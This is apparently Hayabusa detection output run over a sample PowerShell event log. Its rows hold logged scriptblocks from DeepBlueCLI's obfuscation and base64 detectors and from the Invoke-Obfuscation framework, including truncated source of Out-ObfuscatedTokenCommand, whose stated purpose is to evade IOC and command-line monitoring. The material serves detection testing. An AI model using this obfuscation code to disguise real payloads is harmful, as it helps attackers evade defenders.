Exiting..."" exit 1 } } return $logname }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:27.684 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:41.504 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in 
the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:41.506 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function 
Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:41.506 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:41.507 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:42.511 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:49.242 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" sysmon",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:49.249 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";ID=1,7} -ErrorAction Stop",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:52.107 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:12:04.061 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,.\DeepBlue-0.3.ps1,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:12:04.069 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{Logname=""Security"";ID=4688,4720,4728,4732,4625} -ErrorAction Stop",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 
18:12:09.520 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:13:28.641 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,.\DeepBlue-0.3.ps1 ..\sysmon1.evtx sysmon,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:13:28.657 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{path=""..\sysmon1.evtx"";ID=1,7} -ErrorAction Stop",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:13:31.538 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:21.320 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:31.954 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,cd C:\Users\student\Desktop\Invoke-Obfuscation-master\,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:31.956 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:38.671 +00:00,SEC511,4104,info,,PwSh Scriptblock 
Log,Invoke-Obfuscation,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:38.711 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:38.715 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:38.716 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:38.776 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.198 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,Import-Module .\Invoke-Obfuscation.psd1,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.202 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Module manifest for module 'Invoke-Obfuscation' # # Generated by: Daniel Bohannon (@danielhbohannon) # # Generated on: 2017-01-19 # @{ # Version number of this module. ModuleVersion = '1.1' # ID used to uniquely identify this module GUID = 'd0a9150d-b6a4-4b17-a325-e3a24fed0aa9' # Author of this module Author = 'Daniel Bohannon (@danielhbohannon)' # Copyright statement for this module Copyright = 'Apache License, Version 2.0' # Description of the functionality provided by this module Description = 'PowerShell module file for importing all required modules for the Invoke-Obfuscation framework.' 
# Minimum version of the Windows PowerShell engine required by this module PowerShellVersion = '2.0' # Minimum version of the Windows PowerShell host required by this module PowerShellHostVersion = '2.0' # Script files (.ps1) that are run in the caller's environment prior to importing this module ScriptsToProcess = @('Out-ObfuscatedTokenCommand.ps1','Out-ObfuscatedStringCommand.ps1','Out-EncodedAsciiCommand.ps1','Out-EncodedHexCommand.ps1','Out-EncodedOctalCommand.ps1','Out-EncodedBinaryCommand.ps1','Out-SecureStringCommand.ps1','Out-EncodedBXORCommand.ps1','Out-EncodedSpecialCharOnlyCommand.ps1','Out-EncodedWhitespaceCommand.ps1','Out-PowerShellLauncher.ps1','Invoke-Obfuscation.ps1') # Functions to export from this module FunctionsToExport = '*' # HelpInfo URI of this module # HelpInfoURI = '' }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedTokenCommand { <# .SYNOPSIS Master function that orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script. 
Invoke-Obfuscation Function: Out-ObfuscatedTokenCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER TokenTypeToObfuscate (Optional) Specifies the token type to obfuscate ('Command', 'CommandArgument', 'Comment', 'Member', 'String', 'Type', 'Variable', 'RandomWhitespace'). If not defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given TokenTypeToObfuscate. If not defined then Out-ObfuscatedTokenCommand will automatically perform obfuscation function at the highest available obfuscation level. Each token has different available obfuscation levels: 'Argument' 1-4 'Command' 1-3 'Comment' 1 'Member' 1-4 'String' 1-2 'Type' 1-2 'Variable' 1 'Whitespace' 1 'All' 1 .EXAMPLE C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} .( ""{0}{2}{1}"" -f'Write','t','-Hos' ) ( 'Hell' + 'o ' +'Wor'+ 'ld!' 
) -ForegroundColor ( ""{1}{0}"" -f 'een','Gr') ; .( ""{1}{2}{0}""-f'ost','Writ','e-H' ) ( 'O' + 'bfusca'+ 't' + 'ion Rocks' + '!') -ForegroundColor ( ""{1}{0}""-f'een','Gr' ) .NOTES Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('Member', 'Command', 'CommandArgument', 'String', 'Variable', 'Type', 'RandomWhitespace', 'Comment')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [String] $TokenTypeToObfuscate, [Parameter(Position = 2)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = 10 # Default to highest obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # If $TokenTypeToObfuscate was not defined then we will automate randomly calling all available obfuscation functions in Out-ObfuscatedTokenCommand. 
If($TokenTypeToObfuscate.Length -eq 0) { # All available obfuscation token types (minus 'String') currently supported in Out-ObfuscatedTokenCommand. # 'Comment' and 'String' will be manually added first and second respectively for reasons defined below. # 'RandomWhitespace' will be manually added last for reasons defined below. $ObfuscationChoices = @() $ObfuscationChoices += 'Member' $ObfuscationChoices += 'Command' $ObfuscationChoices += 'CommandArgument' $ObfuscationChoices += 'Variable' $ObfuscationChoices += 'Type' # Create new array with 'String' plus all obfuscation types above in random order. $ObfuscationTypeOrder = @() # Run 'Comment' first since it will be the least number of tokens to iterate through, and comments may be introduced as obfuscation technique in future revisions. $ObfuscationTypeOrder += 'Comment' # Run 'String' second since otherwise we will have unnecessary command bloat since other obfuscation functions create additional strings. $ObfuscationTypeOrder += 'String' $ObfuscationTypeOrder += (Get-Random -Input $ObfuscationChoices -Count $ObfuscationChoices.Count) # Apply each randomly-ordered $ObfuscationType from above step. ForEach($ObfuscationType in $ObfuscationTypeOrder) { $ScriptString = Out-ObfuscatedTokenCommand ([ScriptBlock]::Create($ScriptString)) $ObfuscationType $ObfuscationLevel } Return $ScriptString } # Parse out and obfuscate tokens (in reverse to make indexes simpler for adding in obfuscated tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) # Handle fringe case of retrieving count of all tokens used when applying random whitespace. 
$TokenCount = ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenTypeToObfuscate}).Count $TokensForInsertingWhitespace = @('Operator','GroupStart','GroupEnd','StatementSeparator') # Script-wide variable ($Script:TypeTokenScriptStringGrowth) to speed up Type token obfuscation by avoiding having to re-tokenize ScriptString for every token. # This is because we are appending variable instantiation at the beginning of each iteration of ScriptString. # Additional script-wide variable ($Script:TypeTokenVariableArray) allows each unique Type token to only be set once per command/script for efficiency and to create less items to create indicators off of. $Script:TypeTokenScriptStringGrowth = 0 $Script:TypeTokenVariableArray = @() If($TokenTypeToObfuscate -eq 'RandomWhitespace') { # If $TokenTypeToObfuscate='RandomWhitespace' then calculate $TokenCount for output by adding token count for all tokens in $TokensForInsertingWhitespace. $TokenCount = 0 ForEach($TokenForInsertingWhitespace in $TokensForInsertingWhitespace) { $TokenCount += ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenForInsertingWhitespace}).Count } } # Handle fringe case of outputting verbiage consistent with options presented in Invoke-Obfuscation. If($TokenCount -gt 0) { # To be consistent with verbiage in Invoke-Obfuscation we will print Argument/Whitespace instead of CommandArgument/RandomWhitespace. $TokenTypeToObfuscateToPrint = $TokenTypeToObfuscate If($TokenTypeToObfuscateToPrint -eq 'CommandArgument') {$TokenTypeToObfuscateToPrint = 'Argument'} If($TokenTypeToObfuscateToPrint -eq 'RandomWhitespace') {$TokenTypeToObfuscateToPrint = 'Whitespace'} If($TokenCount -gt 1) {$Plural = 's'} Else {$Plural = ''} # Output verbiage concerning which $TokenType is currently being obfuscated and how many tokens of each type are left to obfuscate. 
# This becomes more important when obfuscated large scripts where obfuscation can take several minutes due to all of the randomization steps. Write-Host ""`n[*] Obfuscating $($TokenCount)"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" token$Plural."" } # Variables for outputting status of token processing for large token counts when obfuscating large scripts. $Counter = $TokenCount $OutputCount = 0 $IterationsToOutputOn = 100 $DifferenceForEvenOutput = $TokenCount % $IterationsToOutputOn For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Extra output for large scripts with several thousands tokens (like Invoke-Mimikatz). If(($TokenCount -gt $IterationsToOutputOn*2) -AND ((($TokenCount-$Counter)-($OutputCount*$IterationsToOutputOn)) -eq ($IterationsToOutputOn+$DifferenceForEvenOutput))) { $OutputCount++ $ExtraWhitespace = ' '*(([String]($TokenCount)).Length-([String]$Counter).Length) If($Counter -gt 0) { Write-Host ""[*] $ExtraWhitespace$Counter"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" tokens remaining to obfuscate."" } } $ObfuscatedToken = """" If(($Token.Type -eq 'String') -AND ($TokenTypeToObfuscate.ToLower() -eq 'string')) { $Counter-- # If String $Token immediately follows a period (and does not begin $ScriptString) then do not obfuscate as a String. # In this scenario $Token is originally a Member token that has quotes added to it. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If(($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) { Continue } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. 
If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Binding Validation Attributes cannot have their string values formatted with the -f format operator unless treated as a scriptblock. # When we find strings following these Parameter Binding Validation Attributes then if we are using a -f format operator we will treat the result as a scriptblock. # Source: https://technet.microsoft.com/en-us/library/hh847743.aspx $ParameterValidationAttributesToTreatStringAsScriptblock = @() $ParameterValidationAttributesToTreatStringAsScriptblock += 'alias' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allownull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptystring' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptycollection' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatecount' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatelength' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatepattern' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validaterange' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatescript' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validateset' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnullorempty' $ParameterValidationAttributesToTreatStringAsScriptblock += 'helpmessage' $ParameterValidationAttributesToTreatStringAsScriptblock += 'confirmimpact' $ParameterValidationAttributesToTreatStringAsScriptblock += 'outputtype' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel 
value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Member') -AND ($TokenTypeToObfuscate.ToLower() -eq 'member')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Attributes cannot be obfuscated like other Member Tokens, so we will only randomize the case of these tokens. # Source 1: https://technet.microsoft.com/en-us/library/hh847743.aspx $MemberTokensToOnlyRandomCase = @() $MemberTokensToOnlyRandomCase += 'mandatory' $MemberTokensToOnlyRandomCase += 'position' $MemberTokensToOnlyRandomCase += 'parametersetname' $MemberTokensToOnlyRandomCase += 'valuefrompipeline' $MemberTokensToOnlyRandomCase += 'valuefrompipelinebypropertyname' $MemberTokensToOnlyRandomCase += 'valuefromremainingarguments' $MemberTokensToOnlyRandomCase += 'helpmessage' $MemberTokensToOnlyRandomCase += 'alias' # Source 2: https://technet.microsoft.com/en-us/library/hh847872.aspx $MemberTokensToOnlyRandomCase += 'confirmimpact' $MemberTokensToOnlyRandomCase += 'defaultparametersetname' $MemberTokensToOnlyRandomCase += 'helpuri' $MemberTokensToOnlyRandomCase += 'supportspaging' $MemberTokensToOnlyRandomCase += 'supportsshouldprocess' $MemberTokensToOnlyRandomCase += 'positionalbinding' $MemberTokensToOnlyRandomCase += 'ignorecase' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1} 4 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2} default 
{Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'CommandArgument') -AND ($TokenTypeToObfuscate.ToLower() -eq 'commandargument')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} 4 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
# See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedTokenCommand { <# .SYNOPSIS Master function that orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script. Invoke-Obfuscation Function: Out-ObfuscatedTokenCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER TokenTypeToObfuscate (Optional) Specifies the token type to obfuscate ('Command', 'CommandArgument', 'Comment', 'Member', 'String', 'Type', 'Variable', 'RandomWhitespace'). If not defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given TokenTypeToObfuscate. If not defined then Out-ObfuscatedTokenCommand will automatically perform obfuscation 